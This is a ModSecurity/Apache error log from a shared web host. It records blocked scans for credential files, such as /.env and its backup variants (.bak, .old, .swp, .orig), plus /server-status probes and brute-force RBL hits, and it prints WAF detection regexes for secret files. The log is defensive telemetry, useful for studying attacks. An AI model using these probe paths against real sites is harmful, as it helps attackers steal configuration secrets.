[Tue May 26 13:24:43.017421 2026] [security2:error] [pid 512344:tid 512554] [client 94.31.109.208:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRwsbElyei4S77DQfzCwAAAFA"]
[Tue May 26 13:24:43.389890 2026] [security2:error] [pid 512344:tid 512561] [client 208.84.100.173:50946] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.production.copy"] [unique_id "ahVRw8bElyei4S77DQfzFwAAAFc"]
[Tue May 26 13:24:43.803680 2026] [security2:error] [pid 512344:tid 512601] [client 208.84.100.173:50946] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.bak"] [unique_id "ahVRw8bElyei4S77DQfzIwAAAH8"]
[Tue May 26 13:24:45.113262 2026] [security2:error] [pid 512344:tid 512576] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRxMbElyei4S77DQfzPQAAAGY"]
[Tue May 26 13:24:45.395732 2026] [security2:error] [pid 512344:tid 512577] [client 208.84.100.173:50964] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.local.bak"] [unique_id "ahVRxcbElyei4S77DQfzSQAAAGc"]
[Tue May 26 13:24:45.396514 2026] [security2:error] [pid 512344:tid 512579] [client 208.84.100.173:50934] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.local.backup"] [unique_id "ahVRxcbElyei4S77DQfzSgAAAGk"]
[Tue May 26 13:24:45.397005 2026] [security2:error] [pid 512344:tid 512539] [client 208.84.100.173:50946] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.production.old"] [unique_id "ahVRxcbElyei4S77DQfzTAAAAEE"]
[Tue May 26 13:24:45.397011 2026] [security2:error] [pid 512745:tid 512947] [client 208.84.100.173:50998] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.local.old"] [unique_id "ahVRxXKSB_s2CvZg7xNZ1wAAAVI"]
[Tue May 26 13:24:45.602234 2026] [security2:error] [pid 512344:tid 512527] [client 208.84.100.173:56354] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.swp"] [unique_id "ahVRxcbElyei4S77DQfzTwAAADU"]
[Tue May 26 13:24:45.604334 2026] [security2:error] [pid 512745:tid 512929] [client 208.84.100.173:56358] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.orig"] [unique_id "ahVRxXKSB_s2CvZg7xNZ2QAAAUA"]
[Tue May 26 13:24:45.606277 2026] [security2:error] [pid 512745:tid 512955] [client 208.84.100.173:56372] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.copy"] [unique_id "ahVRxXKSB_s2CvZg7xNZ2gAAAVo"]
[Tue May 26 13:24:45.607277 2026] [security2:error] [pid 512745:tid 512887] [client 208.84.100.173:56418] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.local~"] [unique_id "ahVRxXKSB_s2CvZg7xNZ2wAAARY"]
[Tue May 26 13:24:45.607431 2026] [security2:error] [pid 512745:tid 512916] [client 208.84.100.173:56440] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.production.backup"] [unique_id "ahVRxXKSB_s2CvZg7xNZ3AAAATM"]
[Tue May 26 13:24:45.608111 2026] [security2:error] [pid 512344:tid 512525] [client 208.84.100.173:56408] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.local.orig"] [unique_id "ahVRxcbElyei4S77DQfzUQAAADM"]
[Tue May 26 13:24:45.608160 2026] [security2:error] [pid 512745:tid 512914] [client 208.84.100.173:56458] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.production.orig"] [unique_id "ahVRxXKSB_s2CvZg7xNZ4AAAATE"]
[Tue May 26 13:24:45.608208 2026] [security2:error] [pid 512745:tid 512881] [client 208.84.100.173:56456] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.production~"] [unique_id "ahVRxXKSB_s2CvZg7xNZ3wAAARA"]
[Tue May 26 13:24:45.608230 2026] [security2:error] [pid 512344:tid 512503] [client 208.84.100.173:56406] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.production.bak"] [unique_id "ahVRxcbElyei4S77DQfzUgAAAB0"]
[Tue May 26 13:24:45.608326 2026] [security2:error] [pid 512344:tid 512517] [client 208.84.100.173:56392] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.local.swp"] [unique_id "ahVRxcbElyei4S77DQfzUAAAACs"]
[Tue May 26 13:24:45.608530 2026] [security2:error] [pid 512745:tid 512918] [client 208.84.100.173:56470] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.production.swp"] [unique_id "ahVRxXKSB_s2CvZg7xNZ3QAAATU"]
[Tue May 26 13:24:45.608995 2026] [security2:error] [pid 512344:tid 512479] [client 208.84.100.173:56388] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.local.copy"] [unique_id "ahVRxcbElyei4S77DQfzUwAAAAU"]
[Tue May 26 13:24:45.615689 2026] [security2:error] [pid 512344:tid 512596] [client 208.84.100.173:56316] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.old"] [unique_id "ahVRxcbElyei4S77DQfzVAAAAHo"]
[Tue May 26 13:24:45.615833 2026] [security2:error] [pid 512344:tid 512482] [client 208.84.100.173:56300] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.backup"] [unique_id "ahVRxcbElyei4S77DQfzVQAAAAg"]
[Tue May 26 13:24:45.616730 2026] [security2:error] [pid 512344:tid 512507] [client 208.84.100.173:56346] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env~"] [unique_id "ahVRxcbElyei4S77DQfzVwAAACE"]
[Tue May 26 13:24:47.498960 2026] [security2:error] [pid 512745:tid 512952] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRx3KSB_s2CvZg7xNZ8gAAAVc"]
[Tue May 26 13:24:49.906101 2026] [security2:error] [pid 512745:tid 512912] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRyXKSB_s2CvZg7xNaEgAAAS8"]
[Tue May 26 13:24:52.012541 2026] [security2:error] [pid 512344:tid 512514] [client 176.65.139.237:50008] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "srsglobalsoft.com"] [uri "/.env"] [unique_id "ahVRzMbElyei4S77DQfznwAAACg"]
[Tue May 26 13:24:52.145529 2026] [security2:error] [pid 512344:tid 512580] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRy8bElyei4S77DQfzmwAAAGo"]
[Tue May 26 13:24:52.148005 2026] [security2:error] [pid 512745:tid 512908] [client 176.65.139.237:50018] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.codealtis.srsglobalsoft.com"] [uri "/.env"] [unique_id "ahVRzHKSB_s2CvZg7xNaOwAAASs"]
[Tue May 26 13:24:52.163572 2026] [security2:error] [pid 512745:tid 512933] [client 176.65.139.235:60534] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.armourin.srsglobalsoft.com"] [uri "/.env"] [unique_id "ahVRzHKSB_s2CvZg7xNaPAAAAUQ"]
[Tue May 26 13:24:53.058112 2026] [security2:error] [pid 512745:tid 512876] [client 176.65.139.233:27880] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.financepointaustralia.srsglobalsoft.com"] [uri "/.env"] [unique_id "ahVRzXKSB_s2CvZg7xNaTAAAAQs"]
[Tue May 26 13:24:54.441777 2026] [security2:error] [pid 512745:tid 512984] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRznKSB_s2CvZg7xNaYAAAAXc"]
[Tue May 26 13:24:55.630321 2026] [security2:error] [pid 512344:tid 512493] [client 45.91.64.6:45934] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "208.91.198.65"] [uri "/server-status"] [unique_id "ahVRz8bElyei4S77DQfz0QAAABM"]
[Tue May 26 13:24:55.680478 2026] [fcgid:warn] [pid 512344:tid 512482] (70014)End of file found: [client 176.32.193.16:57326] mod_fcgid: can't get data from http client
[Tue May 26 13:24:56.755893 2026] [fcgid:warn] [pid 512344:tid 512545] (70014)End of file found: [client 176.32.193.16:57338] mod_fcgid: can't get data from http client
[Tue May 26 13:24:56.818640 2026] [security2:error] [pid 512344:tid 512514] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVR0MbElyei4S77DQfz7QAAACg"]
[Tue May 26 13:24:59.113817 2026] [security2:error] [pid 512344:tid 512529] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVR0sbElyei4S77DQf0CwAAADc"]
[Tue May 26 13:25:00.039026 2026] [security2:error] [pid 512344:tid 512560] [client 185.255.126.23:25507] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVR08bElyei4S77DQf0GwAAAFY"], referer: https://www.glorodrc.com/index.php?route=information/contact
[Tue May 26 13:25:00.865827 2026] [security2:error] [pid 512344:tid 512506] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVR1MbElyei4S77DQf0JQAAACA"]
[Tue May 26 13:25:03.136062 2026] [security2:error] [pid 512745:tid 512937] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVR1nKSB_s2CvZg7xNatQAAAUg"]
[Tue May 26 13:25:06.136523 2026] [security2:error] [pid 512745:tid 512882] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVR2XKSB_s2CvZg7xNa6QAAARE"]
[Tue May 26 13:25:07.976041 2026] [security2:error] [pid 512344:tid 512500] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVR28bElyei4S77DQf0gAAAABo"]
[Tue May 26 13:25:08.288508 2026] [security2:error] [pid 512745:tid 512992] [client 14.176.50.77:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVR23KSB_s2CvZg7xNbFgAAAX8"]
[Tue May 26 13:25:09.711274 2026] [security2:error] [pid 512344:tid 512596] [client 45.91.64.6:57104] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "208.91.198.65"] [uri "/server-status"] [unique_id "ahVR3cbElyei4S77DQf0oQAAAHo"]
[Tue May 26 13:25:09.717735 2026] [fcgid:warn] [pid 512344:tid 512579] (70014)End of file found: [client 45.91.64.8:46152] mod_fcgid: can't get data from http client
[Tue May 26 13:25:10.464963 2026] [fcgid:warn] [pid 512745:tid 512978] (70014)End of file found: [client 45.91.64.8:46166] mod_fcgid: can't get data from http client
[Tue May 26 13:25:10.855958 2026] [security2:error] [pid 512745:tid 512944] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVR3nKSB_s2CvZg7xNbLQAAAU8"]
[Tue May 26 13:25:11.395795 2026] [security2:error] [pid 512344:tid 512378] [remote 74.7.241.58:52230] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVR38bElyei4S77DQf0uwAAAiE"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/lib
[Tue May 26 13:25:13.174083 2026] [security2:error] [pid 512344:tid 512521] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVR4MbElyei4S77DQf0zgAAAC8"]
[Tue May 26 13:25:14.624935 2026] [security2:error] [pid 512745:tid 512879] [client 170.199.224.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVR4XKSB_s2CvZg7xNbWAAAAQ4"], referer: https://www.anujtradingco.com/
[Tue May 26 13:25:15.150175 2026] [security2:error] [pid 512745:tid 513000] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVR4nKSB_s2CvZg7xNbdAAAAYc"]
[Tue May 26 13:25:16.161378 2026] [security2:error] [pid 512344:tid 512552] [client 170.199.224.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVR5MbElyei4S77DQf0-wAAAE4"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1225630&moderation-hash=1c91b5c556a43bd9bd7586e495750589
[Tue May 26 13:25:16.288278 2026] [security2:error] [pid 512745:tid 512911] [client 193.142.103.245:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVR4nKSB_s2CvZg7xNbcAAAAS4"]
[Tue May 26 13:25:16.737223 2026] [security2:error] [pid 512745:tid 512896] [client 176.65.139.231:17116] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.usteve.com.svijaykumar.in"] [uri "/.env"] [unique_id "ahVR5HKSB_s2CvZg7xNbkwAAAR8"]
[Tue May 26 13:25:17.953302 2026] [security2:error] [pid 512745:tid 512834] [remote 91.134.89.60:49732] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.89.134.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahVR5XKSB_s2CvZg7xNbpAABL1g"]
[Tue May 26 13:25:17.988979 2026] [security2:error] [pid 512745:tid 512977] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVR5XKSB_s2CvZg7xNboAAAAXA"]
[Tue May 26 13:25:18.214298 2026] [security2:error] [pid 512745:tid 512998] [client 49.13.164.148:56098] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVR5XKSB_s2CvZg7xNbogAAAYU"], referer: http://ucdc.co.in/
[Tue May 26 13:25:19.532334 2026] [security2:error] [pid 512745:tid 512993] [client 170.199.224.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVR53KSB_s2CvZg7xNbxAAAAYA"], referer: https://anujtradingco.com
[Tue May 26 13:25:20.455753 2026] [security2:error] [pid 512344:tid 512584] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVR6MbElyei4S77DQf1IgAAAG4"]
